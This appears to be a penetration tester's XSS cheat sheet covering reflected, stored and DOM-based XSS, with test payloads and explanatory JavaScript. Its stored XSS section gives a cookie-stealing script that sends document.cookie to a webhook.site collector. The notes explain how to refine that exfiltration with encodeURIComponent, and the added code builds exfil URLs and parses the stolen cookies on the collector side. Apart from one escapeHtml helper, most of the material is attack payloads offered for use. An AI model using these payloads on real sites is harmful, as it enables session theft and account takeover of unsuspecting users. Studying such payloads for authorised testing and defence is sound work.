XSS

Types

  • Reflected

  • Stored

  • DOM Based

Test Payloads

alert(1)  # avoid: the literal string alert( is often blocked by filters/WAFs
print()
prompt('hello')

DOM Based

The injection happens entirely in client-side JavaScript: a source such as location.hash, location.search or document.referrer is written into a sink such as innerHTML, document.write or eval. When the tainted value lives in the URL fragment (after #), nothing is sent to the server, so server-side logs and filters never see the payload.

<script>prompt(1)</script>
<img src=x onerror="prompt(1)">

Note that <script> inserted via innerHTML does not execute; the <img onerror> form does, so prefer it when testing innerHTML sinks.
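The source-to-sink flow described above, modelled without a browser as an added example (not code from the original notes). The page code, URL and the #name= fragment parameter are assumed for illustration: the vulnerable render concatenates the fragment into markup meant for innerHTML, the safe render escapes it first (the equivalent of using textContent).

```javascript
// Added example: DOM-based XSS source -> sink, simulated in plain JS.
// Assumptions: a hypothetical profile page that greets the user by a name
// taken from the URL fragment "#name=...".

function nameFromFragment(url) {
  // Source: the fragment. Browsers never send it to the server.
  const hash = new URL(url).hash; // e.g. "#name=%3Cimg%20src%3Dx..."
  const m = /^#name=(.*)$/.exec(hash);
  return m ? decodeURIComponent(m[1]) : "guest";
}

// Vulnerable: raw string concatenation into markup destined for innerHTML.
function renderVulnerable(url) {
  return "<h1>Hello " + nameFromFragment(url) + "</h1>";
}

// Hardened: escape the HTML-significant characters before interpolation.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, c => map[c]);
}

function renderSafe(url) {
  return "<h1>Hello " + escapeHtml(nameFromFragment(url)) + "</h1>";
}

// Check used by the tests: does the markup contain a tag with an on*= handler?
function containsEventHandler(html) {
  return /<[^>]+\son\w+\s*=/i.test(html);
}

// Constructed payload URL carrying the <img onerror> form from the notes.
const PAYLOAD_URL =
  "https://example.test/profile#name=" +
  encodeURIComponent('<img src=x onerror="prompt(1)">');

console.log("vulnerable:", renderVulnerable(PAYLOAD_URL));
console.log("safe:      ", renderSafe(PAYLOAD_URL));
```

Run it with node; the first line prints live markup containing onerror, the second prints the same payload rendered inert as text.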

Stored XSS

First check for HTML injection: submit a harmless tag and see whether the page renders it as markup rather than as text

<h1>test1</h1>

If the heading renders, go for XSS

<script>alert(document.cookie)</script>
<script>var i = new Image; i.src="https://webhook.site/55423ec0-8c07-42cd-8346-1f91cff37e05/?"+document.cookie;</script>

The trailing /? on the collector URL turns the appended cookie string into the query string of the request, so it shows up in the collector's request log

  • var i = new Image;

    • Creates a new Image object in JavaScript. Assigning its src fires a GET request without adding anything visible to the page, which is why it is commonly used to send data to a server quietly.

  • i.src = "https://webhook.site/.../?" + document.cookie;

    • Sets the image's source URL to the collector URL with document.cookie appended. document.cookie is a string of all cookies readable by the page, as name=value pairs separated by "; ".

    • The browser requests that URL, so the cookie string arrives in the collector's request log. If src were set to "" + document.cookie alone, the request would go to a relative path on the victim site and nothing would reach the attacker.

    • Caveats: cookies flagged HttpOnly are not in document.cookie and cannot be stolen this way; and because the cookie string is appended unencoded, a "&" or "=" inside a cookie value gets parsed as part of the query, so wrap it in encodeURIComponent() if values matter.
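The exfiltration URL built by the payload above, as an added example (not code from the original notes) showing what the collector actually receives for the naive form versus an encoded one. The collector hostname and the sample cookie string are constructed for illustration.

```javascript
// Added example: build the exfil URL the Image() trick requests and parse it
// the way the collector would. COLLECTOR is a hypothetical listener.

const COLLECTOR = "https://collector.example/c";

// Constructed sample of a document.cookie value. HttpOnly cookies would not
// appear in it at all, so a session cookie with that flag is out of reach.
const SAMPLE_COOKIE = "session=abc123; theme=dark; csrf=t0k&en";

// Naive form from the payload: cookie string appended unencoded after /?
function naiveExfilUrl(cookie) {
  return COLLECTOR + "/?" + cookie;
}

// Hardened form: one parameter, value encoded so "; ", "&" and "=" survive.
function encodedExfilUrl(cookie) {
  return COLLECTOR + "/?c=" + encodeURIComponent(cookie);
}

// What the naive collector log yields once the URL is parsed as a query string:
// the whole cookie jar lands in one parameter and anything after "&" is split off.
function naiveCollectorView(url) {
  return Object.fromEntries(new URL(url).searchParams.entries());
}

// Collector side for the encoded form: recover the cookie jar as an object.
function cookiesFromRequest(url) {
  const c = new URL(url).searchParams.get("c");
  if (c === null) return null;
  return Object.fromEntries(
    c.split("; ").map(pair => {
      const i = pair.indexOf("=");
      return [pair.slice(0, i), pair.slice(i + 1)];
    })
  );
}

// In a browser the payload is simply:
//   var i = new Image; i.src = encodedExfilUrl(document.cookie);
console.log("naive  :", naiveCollectorView(naiveExfilUrl(SAMPLE_COOKIE)));
console.log("encoded:", cookiesFromRequest(encodedExfilUrl(SAMPLE_COOKIE)));
```

The naive view shows the csrf value truncated at the "&" and an empty "en" parameter, which is exactly the kind of mangled entry you would otherwise puzzle over in the collector log.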
